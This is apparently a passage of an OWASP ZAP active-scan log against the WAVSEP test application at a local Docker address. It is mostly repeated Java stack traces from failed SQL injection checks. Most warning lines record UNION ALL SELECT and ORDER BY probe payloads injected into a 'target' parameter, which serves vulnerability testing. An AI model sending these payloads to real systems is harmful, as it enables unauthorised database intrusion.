org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 8922649 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp) ORDER BY 3460#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp) ORDER BY 3460# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 8922651 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp) UNION ALL SELECT NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp) UNION ALL SELECT NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8922652 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp) UNION ALL SELECT NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp) UNION ALL SELECT NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8922653 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp) UNION ALL SELECT NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp) UNION ALL SELECT NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8922654 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp) UNION ALL SELECT NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp) UNION ALL SELECT NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8922655 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8922656 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8922657 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8922658 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8922659 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8922660 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8922661 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp ORDER BY 1#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp ORDER BY 1# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at 